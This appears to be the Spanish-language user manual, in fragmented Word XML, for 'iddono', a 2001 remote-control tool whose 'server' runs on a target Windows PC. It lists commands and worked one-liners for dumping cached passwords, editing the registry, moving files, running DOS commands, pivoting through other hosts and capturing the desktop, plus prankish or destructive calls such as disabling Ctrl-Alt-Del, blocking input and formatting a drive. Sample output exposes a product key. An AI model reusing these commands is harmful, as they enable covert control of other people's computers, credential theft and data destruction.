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u w:val="single"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>iddon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HOW MUCH YOU KN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u w:val="single"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>ABOUT CONTROL, CHICO?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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>iddono v1.5 beta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-AR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(LOAD LIBRARY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arga la libreria (DLL), desde la que se llamara a una API dentro de ella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LIB user32.dll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tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="10792" w:leader="none"/>
        </w:tabs>
        <w:ind w:right="1118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i la API se encuentra en otro directorio distinto del PATH original de Windows, entonces se debe indicar la ruta exacta de la siguiente forma:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="10792" w:leader="none"/>
        </w:tabs>
        <w:ind w:right="1118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LIB 'c:\archivos de programas\dlls\midll.dll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 conveniente que las libreria se cargen una sola vez y se utilizen todo lo necesario. Y luego se descargen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mediante ULIB. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="10792" w:leader="none"/>
        </w:tabs>
        <w:ind w:right="1118" w:hanging="0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APIN (API NAME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ombre original de la API dentro de la libreria cargada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PIN MessageBoxA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PIN GetWindowsDirectoryA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PIN GetUserNameA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o es necesario llamar a esta instruccion mas de una vez. Siempre que aun no se haya descargado la libreria y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la funcion sea reutilizada repetidament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RAPI (RUN API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Ejecuta la funcion declarada previamente atravez de APIN. RAPI requiere del paso de parametros necesarios que se le pasan a la API de la libreria. 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l signo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> $ indica que el parametro pasado es un puntero a una cadena. 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l signo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> $&gt; el numero que le sigue indica una cadena de esa longitud.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l signo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> @ indica que el parametro pasado es un tipo numerico.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l signo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> @&gt; es un puntero al dato que se pasa como parametro (solo para enteros).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l signo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> # para valores de tipo DWORD (se debe pasar el numero como hexadecimal).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l signo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> #&gt; es un puntero al dato que se pasa como parametro (solo para DWORD).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a variable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> RET contiene el valor de tipo entero devuelto por la ultima API que se llamo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:right="834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ind w:right="834" w:hanging="0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RAPI $'c:\command.com' @1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API $'SYSTEMSTART' @0 @0 @0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API $'set CDAudio door closed' @0 @0 @0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API @128 $'Caja de Texto (TextBox)' $'Una cadena de texto' @1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API @1 @0 #4294541079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a cantidad de parametros soportados hasta el momento es de 8 (ocho) parametros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  <w:lang w:val="es-AR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es-AR"/>
        </w:rPr>
        <w:t>Uso de los tipos de datos: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  <w:lang w:val="es-AR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sar @&gt; en parametros de tipo: LPDWORD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Usar @ en parametros de tipo: HDC, UINT, int, HWND, DWORD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Usar $ o $&gt; en parametros de tipo: LPTSTR, LPCTSTR.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sar #&gt; en parametros de tipo: LPDWORD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Usar #  en parametros de tipo: HDC, HWND, DWORD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STRU (STRUCTURE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Es un apuntador a una estructura de tipo STRU. Los parametros se pasan separados por espacio y ningun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dentificador de tipo de dat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TRU @100 @100 @150 @15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u w:val="single"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>NOTA:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> STRU permite el paso de hasta 20 parametros, y los parametros permitidos son iguales a los que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 utilizan para el paso de parametros en las llamadas a funciones de libreria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ULIB (UNLOAD LIBRARY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Descarga la libreria (DLL). En caso de que se necesite usar una misma API en un loop, no es necesario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scargar la libreria hasta el fin de la rutina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u w:val="single"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>NOTA:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Siempre que se carga una nueva DLL se descarga la libreria anterior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OPRT (OUT PORT)  * Windows 98/Me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nvia una serie de bits al puerto especificado. Por ejemplo podemos probar enviando el numero entero 28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l puerto 1010 (3F8). El puerto 3F8 es uno de los puertos destinados a la controladora de disketes. Para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ejecutar la instruccion basta con escrivir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PRT 1010 28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 puede tener acceso a cualquier puerto per los paraemtros que se pasen deven ser revisado antes de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nviarlos por que pueden cusar que el server deje de funcionar. Estos es devido a que solo se puede envia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n byte al puerto fisico que se indique (por ahora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u w:val="single"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>NOTA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>: En Windows NT o 2000 esta instruccion produce que el server se cuelgu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NINF (NET INFO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informacion de conexiones de red, grupos de trabajo, etc. en el que se encuantra el server. Si no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se pasa ningun parametro NINF devuelve solo un listado de los recursos de red compartido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INF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a conectar una unidad de red en la computadora remota, de deben pasar los siguientes parametro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INF '\\SERVERZ\C' 'J:' 'password' 0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o creara una nueva unidad (J:) en la computadora del server que estara conectada al disco compartid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mo 'C' de la PC SERVERZ. Si no hay password las comillas simples van sin nada dentro, y lo mism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i no se quieres crear una unidad, por ejemplo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INF '\\SERVERZ\C' '' '' 0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AWN (GET ACTIVE WINDOWS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informacion de las ventanas activas. Tiene siete tipos de respuetas como se descriven a continuacion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LS: Devuelve el nombre de la clase de las ventanas activas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IL: Devuelve el nombre de las ventanas activas (titulo de la ventana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WN: Devuelve el manejador de la ventana (handle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CW: Devuelve el nombre de la clase de las ventanas activas seguido por el manejador (handle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TW: Devuelve el nombre de las ventanas activas seguido por el manejador (handle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PW: Devuelve el path de la aplicacion que se esta ejecutando y el manejador (handle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PP: Devuelve el path de la aplicacion que se esta ejecutando y el identificador de proceso (PID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FID (GET FILES DIRECTORY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los archivos contenidos en una carpeta de Windows. El parametro indica el nombre de la carpeta de l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que se quiere conocer los archivos que estan dentr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GFID 'c:\win98\*.*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FID '\\server\disco\*.*'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uando se listan archivos de una PC conectada atravez de una red puede pasar que no se devuelva ningun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rchivo, eso es por que el recurso de red no esta conectado. Para conectar un recurso de red a la PC d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rver sin crear una nueva unidad se debe hacer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INF '\\server\disco' '' 'password' 0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despues de esto, esto otro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FID '\\server\disco\*.*'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es-AR"/>
        </w:rPr>
        <w:t>Resultados de la instrucción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&lt;D&gt;  =  Directorio (Directory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&lt;A&gt;  =  Archivo (Archive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&lt;S&gt;  =  Sistema (System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&lt;H&gt;  =  Oculto (Hide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 xml:space="preserve">&lt;R&gt;  =  Solo Lectura (Read Only)  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PWS (GET CACHED PASSWORDS)  * Windows 98/Me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Devuelve las passwords de usuario de sesion en Windows. No lleva parametros. Usar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PWS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DONT USE / DONT ABUSE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OKEY (REGISTRY OPEN KEY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bre una llave del registro para listar valores y sub-keys, modificar, borrar y crear valores. Para abri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na clave se deven pasar los siguientes parametro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KEY LOCAL_MACHINE Software\Microsoft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a instruccion abre la clave LOCAL_MACHINE\Software\Microsoft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KEY LOCAL_MACHINE Software\Microsoft\Windows\CurrentVersion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os son los parametros permitidos para las claves iniciales del registro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CLASESS_ROOT = CLASESS_ROOT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CURRENT_USER = CURRENT_USE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LOCAL_MACHINE = LOCAL_MACHINE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USERS = USER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PERFORMANCE_DATA = PERFORMANCE_DAT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CURRENT_CONFIG = CURRENT_CONFIG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KEY_DYN_DATA = DYN_DAT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CVAL (CREATE VALUE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rea o modifica valores contenidos dentro de una clave previamente abierta con la instruccion OKEY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os parametros que se deben pasar son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CVAL FOOD $'sos unamierda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VAL SUCKKS @666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VAL 'SIXXXZ PUTO' @666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  <w:lang w:val="es-AR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es-AR"/>
        </w:rPr>
        <w:t>Uso de los tipos de datos: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  <w:lang w:val="es-AR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sar @ para valores de tipo DWORD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Usar $ para valores de tipo String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sar &gt; para valores de tipo Binary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DVAL (DELETE VALUE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Borra valores contenidos dentro de una clave previamente abierta con la instruccion OKEY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os parametros que se deben pasar son el nombre del valor que se desea eliminar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DVAL FOOD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VAL SUCKKS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VAL 'SIXXXZ PUTO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CKEY (CREATE KEY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rea una nueva clave en el registro (una subclave que desciende de la clave ya previamente abiert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 la instruccion OKEY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KEY 'Sos Una mierda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DKEY (DELETE KEY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Borra una nueva clave en el registro (una subclave que desciende de la clave ya previamente abiert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 la instruccion OKEY)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KEY 'Sos Una mierda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VLS (GET VALUES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un listado de los valores que se encuentran dentro de la clave abierta mediante OKEY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Si se llama a la instruccion sin ningun parametro devuelve solo el nombre de los valores que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tiene la clave. Si se agrega el parametro GET devuelve el nombre de cada valor seguido po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el contenido de este. Esto devuelve al hacer: GVLS GET;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GVLS GET)//RET:0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nstallType(+)03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tupFlags(+)08050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icePath(+)C:\Windows\INF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roductType(+)101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egisteredOwner(+)Perrito Sub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egisteredOrganization(+)OKUOP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roductId(+)79878-025-9787371-0597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icensingInfo(+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VD_Region(+)4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BPC_Region(+)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ldWinVer(+)0004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roductKey(+)V3QFJ-DKFDR-THIJ9-C9T49-VAMPQ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igitalProductId(+)A40000000300000037393837382D4032352D393738373337352D303539373000020000003733302D303030303100000000000000E2CE180312F75855E930C0E797860300000000001216493B37E9000000000000000000000000000000000000000000000000000030353230300000000000000000000000FA144E0780000000000000000000000000000000000000000000000000000000000000000000000020316FE6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SubVersionNumber(+)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rogramFilesDir(+)C:\Archivos de program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mmonFilesDir(+)C:\Archivos de programa\Archivos comune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lus! VersionNumber(+)IE 5 5.00.2314.1003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WallPaperDir(+)C:\Windows\Web\Wallpape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MediaPath(+)C:\Windows\medi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figPath(+)C:\Windows\config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ystemRoot(+)C:\Window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ldWinDir(+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roductName(+)Microsoft Windows 98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egistrationExtDLL(+)OEMREG.DL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egDone(+)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FirstInstallDateTime(+)619BE82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ersion(+)Windows 98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ersionNumber(+)4.10.1998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BootCount(+)3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therDevicePath(+)C:\Windows\INF\OTHE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rogramFilesPath(+)C:\Archivos de program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M_AccessoriesName(+)Accesorio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F_AccessoriesName(+)Accessorie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1. Status(+)4046A8BEA79EC001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tashedGMG(+)E3597040-0EFA-11D5-A3F5-A0E40400ACBF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EAKHelpString(+)Esta es una versión personalizada de Internet Explorer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VAL (GET VALUE)  * Windows 98/Me/2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el contenido de un valor especifico dentro de la clave abierta atravez de OKEY. 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ametro que se le pasa indica el nombre del valor del que se quiere conocer el contenid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VAL BootCount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CHLD (CHILDS)  * Windows 98/Me/2000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un lisatdo de todas las ventanas hijas de la ventana principal especificada. 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ametro que se pasa es un handle de una ventana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CHLD 3284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olvera lo siguiente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CHLD 3664)//RET:0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Edit(+)176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Edit(+)4092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Edit(+)536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Edit(+)38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Edit(+)4076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TreeView(+)384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Edit(+)4068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MaskEdit(+)4084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ListView(+)372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ysHeader32(+)484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Memo(+)86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844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3736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376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3756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3732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374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BitBtn(+)372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FLE (GET FILE)  * Windows 98/Me/2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pia un archivo desde el server a la PC local. El primer parametro indica el puerto por donde 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rver enviara el contenido del archivo que se va a transferir. El segundo parametro es el nombre d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rchivo remoto que se desea copiar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FLE 4444 'c:\file.txt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u w:val="single"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>NOTA:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> El puerto es abierto por el server. Como una transferencia FTP en modo pasiv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PFLE (PUT FILE)  * Windows 98/Me/2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Copia un archivo desde la maquina local al server. El primer parametro es el puerto por donde el server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a a recivir el archivo. El segundo parametro es el nombre del nuevo archivo que se va a crear del lad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l server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FLE 1122 'c:\dap8.exe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u w:val="single"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>NOTA:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> El puerto es abierto por el server. Como una transferencia FTP en modo pasiv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HOST (PROXY CONNECT)  * Windows 98/Me/2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OST permite conectarse a otra PC corriendo el server pero atravez de la PC en la que iniciamos l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exion. Desde este momento el server principal solo se sonvierte en un intermediario, ningun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nstrucción se ejecutara en el server principal sino que seran enviadas por este a otro destinatari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os parametros necesarios para inicar el modo de intermediario son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OST numero-IP port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o conectara el server con la PC remota atravez del puerto especificado. Por ejemplo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OST 198.221.135.148 16666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uando se desea continuar trabajando sobre el server principal solo se debe ingresar la instruccion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OST seguida por ningun parametr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CLB (GET CLIPBOARD TEXT ONLY)  * Windows 98/Me/2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vuelve el contenido del clipboard en el caso de que no se pasen parametros. Para borrar o cambia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contenido del ClipBoard (Solo Texto), se deben pasar los siguientes parametro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GCLB DEL; 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a instruccion borrara el contenido del clipboard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CLB PUT 'sos unamierda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a instruccion pone texto en el clipboard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XDOS (eXecute DOS command)  * Windows 98/Me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jecuta cualquier comando DOS o aplicacion de consola y devuelve la salida. Los parametro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ecesarios son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XDOS 'ping 196.251.224.160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i no se pasa ningun parametro interrumpe la llamad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RAS (LIST REMOTE ACCESS SERVICE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Muestra un listado de todas las conexiones RAS activas. El formato devuelto es el siguiente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LRAS)//RET:0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etServer(+)modem(+)U.S. Robotics 56K Voice INT(+)83E423E8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primer parametro devuelto es el nombre de la conexion, en este caso, NetServer. El segund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ametro es el tipo de conexion seguido por el tercer parametro que identifica el nombre d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ispositivo por el cual se inicio la conexion. El ultimo parametro es el handle que identifica a l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exion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PRXY (PROXY HTTP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Bajo Prueba). Usar: PRXY port [ON/OFF]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Mediante PRXY es posible hacer que el server actue como un proxy HTTP. De esta manera crea un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uevo thread para quedar escuchando en el puerto especificado al enviar el comando. Se puede configurar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el navegador de WEB (Netscape o IExplorer), para usar como servidor proxy HTTP el server iddono,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ndicando la IP y puerto donde este estara escuchando. El puerto debe pasarse como dos enteros,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o palabras, es decir, LOBYTE y HIBYTE, en ese orden. Para conocer el numero de puert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GHBN (GET HOST BY NAME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ta instruccion simplemente actua como la API GetHostByName que introduce Windows en la libreri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WinSock. Usar: GHBN 'HostName'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PRT (LIST PRINTERS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o implementado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PVLG (PRIVILEGIES)  * Windows 2000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o implementado para el control desde el cliente iddono, pero si existe dentro del server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BLOK (BOQUEAR RESPUESTAS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Mediante la instrucción BLOK el server dejara de enviar respuestas, aunque seguira ejecutand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nstrucciones provenientes del cliente. Esto es util cuando si se desea aumentar las velocidad de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comunicación con el server. Usar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BLOK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WASH (LAVAR BUFFER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Limpia el buffer de entrada del server en caso de algun error. Usar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WASH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ESCP (CIERRA CONEXION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ierra la conexion. Usar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CP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u w:val="single"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>ALGUNAS LLAMADAS API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los drives que se encuentren en la PC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 xml:space="preserve">LLIB 'kernel32.dll';APIN 'GetLogicalDrives';RAPI @0 @0 @0 @0;ULIB; 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SAca una caja de texto por la pantall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MessageBoxA;RAPI @128 $'sos unamierda' $nada @1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Enciende el salva pantall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GetDesktopWindow;RAPI @0 @0 @0 @0 @0;APIN SendMessageA;RAPI RET @274 @6176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Envia un mensaje de suspender el sistem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endMessageA;RAPI @128 @274 @61760 @1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Apaga el monitor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endMessageA;RAPI @128 @274 @61808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Muestra un mensaje sobre el escritori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GetDesktopWindow;RAPI;APIN GetWindowDC;RAPI RET @0 @0 @0 @0;APIN DrawTextA;STRU @100 @100 @150 @150;RAPI RET $'mierda' @6 STRU @0;ULIB;STRO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Ocultar o mostrar parte de la barra de tarea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'user32.dll';APIN 'FindWindowA';RAPI $'Shell_TrayWnd' @0 @0 @0 @0;APIN 'FindWindowExA';RAPI RET @0 $'ReBarWindow32' @0 @0;APIN 'ShowWindow';RAPI RET @0 @0 @0 @0;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'user32.dll';APIN 'FindWindowA';RAPI $'Shell_TrayWnd' @0 @0 @0 @0;APIN 'FindWindowExA';RAPI RET @0 $'ReBarWindow32' @0 @0;APIN 'ShowWindow';RAPI RET @4 @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Muestra un mensaje en la barra de titulo de una ventana especificada por el handl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etWindowTextA;RAPI @1912 $'sos unamierda'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shabilita y habilita Ctrl-Alt-Del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ystemParametersInfoA;RAPI @97 @1 @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ystemParametersInfoA;RAPI @97 @0 @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Abrir o cerrar la puerta del CD-Rom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winmm.dll;APIN mciSendStringA;RAPI $'set CDAudio door open' @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winmm.dll;APIN mciSendStringA;RAPI $'set CDAudio door closed' @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Abrir una aplicacion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WinExec;RAPI $'sol.exe' @1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nombre de usuario de Window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advapi32.dll;APIN GetUserNameA;RAPI $&gt;50 @&gt;5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Pone  el sonido de inicio de Window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winmm.dll;APIN PlaySoundA;RAPI $'SYSTEMSTART' @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directorio donde se encuentra Window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WindowsDirectoryA;RAPI $&gt;20 @2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Mueve el cursor del mouse a la posicion que se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etCursorPos;RAPI @10 @10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Bloquea el Windows por complet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BlockInput;RAPI @1 @0 @0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Vaciar la papelera de reciclaj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GetDesktopWindow;RAPI @0 @0 @0 @0 @0;ULIB;LLIB shell32.dll;APIN 'SHEmptyRecycleBinA';RAPI RET $'' @7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Limita el area de movieminto de mous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'user32.dll';APIN 'ClipCursor';STRU @100 @100 @250 @250;RAPI STRU @0 @0 @0 @0;ULIB;STRO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'user32.dll';APIN 'ClipCursor';RAPI @0 @0 @0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ambia el fonfo del escritori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ystemParametersInfoA;RAPI @20 @0 $'c:\logo_inicio.bmp' @3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opia un archiv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CopyFileA;RAPI $'C:\autoexec.bat' $'C:\mierda.txt'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Encuentra la aplicacion asociada al archiv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'shell32.dll';APIN 'FindExecutableA';RAPI $'c:\Netlog.txt' @0 $&gt;100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BEEP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'kernel32.dll';APIN 'Beep';RAPI @2000 @8950 @0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sconecta una unidad de red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mpr.dll;APIN WNetCancelConnection2A;RAPI $'J:' @0 @1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Hace una llamada telefonic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tapi32.dll;APIN tapiRequestMakeCall;RAPI $'1567651890' $&gt;1 $'SOMEBODY' $&gt;1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onocer el espacio libre en el disco rigid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DiskFreeSpaceA;RAPI $'c:\' @&gt;0 @&gt;0 @&gt;0 @&gt;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nombre de la PC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ComputerNameA;RAPI $&gt;120 @&gt;120 @0 @0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directorio actual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CurrentDirectoryA;RAPI @120 $&gt;120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Emite un mensaje de error de elminar archiv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setupapi.dll;APIN SetupDeleteErrorA;RAPI @128 $'Delete ERROR' $'c:\chala.com' @121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información sobre sistema de archivos de la unidad, nombre, numero serie, etc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VolumeInformationA;RAPI $'c:\' $&gt;255 @255 @&gt;0 @0 @0 $&gt;255 @255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tipo de driv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DriveTypeA;RAPI $'g:\'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Minimiza todas las ventana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BroadcastSystemMessageA;RAPI @16 @&gt;8 @274 @61472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Borra toda la lista de documentos recientemente abierto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shell32.dll;APIN SHAddToRecentDocs;RAPI @0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Formatear una unidad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shell32.dll;APIN SHFormatDrive;RAPI @0 @0 @65535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shabilita del menu de una ventana el boton de cerrar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GetSystemMenu;RAPI @3328 @0;APIN EnableMenuItem;RAPI RET @61536 @1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Termina un proces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OpenProcess;RAPI @1 @0 #4294541079;APIN TerminateProcess;RAPI RET @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ambia el volumen de la linea de salida wav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winmm.dll;APIN waveOutSetVolume;RAPI @0 #FFFFFFFF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ambia la visibilidad de la pantalla (WINDOWS 2ooo)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GetWindowLongA;RAPI @655586 @-20;RET? OR $80000;APIN SetWindowLongA;RAPI @655586 @-20 RET;APIN SetLayeredWindowAttributes;RAPI @655586 @0 @50 @2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nombre de la PC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GetComputerNameA;RAPI $&gt;150 @&gt;150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ambia el nombre de la PC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kernel32.dll;APIN SetComputerNameA;RAPI $'FUCKED'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olgar una conexion RAS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rasapi32.dll;APIN RasHangUpA;RAPI #83E423E8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Devuelve el contenido textual de una ventana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endMessageA;RAPI @1868 @13 @255 $&gt;255;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>Cambia el rectangulo cliente del escritorio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LLIB user32.dll;APIN SystemParametersInfoA;STRU @0 @0 @500 @500;RAPI @47 @0 STRU @0;ULIB;STRO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i/>
          <w:iCs/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Es recomendable leer la ayuda Win32 Programmer`s Reference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AR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Una llamada comun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s-AR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"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nviando estas instrucciones al server, de posicionamiento de cursor del mouse en un determinado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lugar de la pantalla.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LIB user32.dll;APIN SetCursorPos;RAPI @10 @10;ULIB;LIB gdi32.dll;APIN GetBkColor;RAPI RET;ULIB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color w:val="008000"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>-.Carga la libreria en donde se encuantra la funcion que queremos usar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i/>
          <w:iCs/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>LLIB user32.dll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u w:val="single"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Respuesta:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:u w:val="single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LLIB user32.dll)//RET:17635424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color w:val="008000"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>-.Indica la funcion que se usara de esta libreria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i/>
          <w:iCs/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>APIN SetCursorPos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u w:val="single"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Respuesta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APIN SetCursorPos)//RET:17635424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color w:val="008000"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>-.Pasamos los parametros que se requieren para llamar a la funcion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i/>
          <w:iCs/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>RAPI @10 @10 @0 @0;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u w:val="single"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Respuesta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RAPI @10 @10 @0 @0)//RET:1//PRS: - 10 - 10 - 0 - 0 - 5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color w:val="008000"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>-.Decargamos la libreria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i/>
          <w:iCs/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>ULIB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u w:val="single"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Respuesta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ULIB)//RET:17635424//PRS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Devuelve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LLIB user32.dll)//RET:17635424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APIN SetCursorPos)//RET:17635424//PRS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(RAPI @10 @10 @0 @0)//RET:1//PRS: - 10 - 10 - 0 - 0 - 5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//EnD(ULIB)//RET:17635424//PRS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//EnD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color w:val="FF0000"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">******************************************************** </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>PLUGINS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ********************************************************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u w:val="single"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>EXPIS.DLL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b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>GetDeskTop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Permite obtener una imagen del escritorio. La imagen se toma en el momento que se realiz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a conexion, y se envia desde el server en formato JPEG. Los parametros que recive la funcion se descriven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 continuacion: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GetDeskTop @Puerto @Radio @Color @Ancho @ Alto @CordX @CordY @Escala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parametro Puerto indica un numero de puerto por el cual se realizara la conexion. El parametro Radio e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radio de compresion de la imagen que va desde 1 a 100. El parametro Color es un valor 1 o 0, para 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alor 0 la imagen devuelta es en colores, para el valor 1 la imagen es en escala de grises. Los parametro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ncho y Alto es el tamaño de la imagen devuelta, y a su vez tambien indican el tamaño de la porcion del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critorio de donde se extraera la imagen. Por otra parte los parametros CordX y CordY son utiles cuando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 desea tomar la imagen desde un angulo especifico del escritorio, generalemnte estos valore son iguales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 cero, ya que se toma el angulo superior izquierdo del escritorio. La Escala es un numero de 1 a 5 y permi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te ampliar el area de la imagen.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lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Usar: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RAPI @1122 @15 @1;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Server Binaries Packed with UPX 1.20w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Version: 1.5 (FSC - for a small control)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Author: iddo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Fecha: Julio 25 de 2001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AR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-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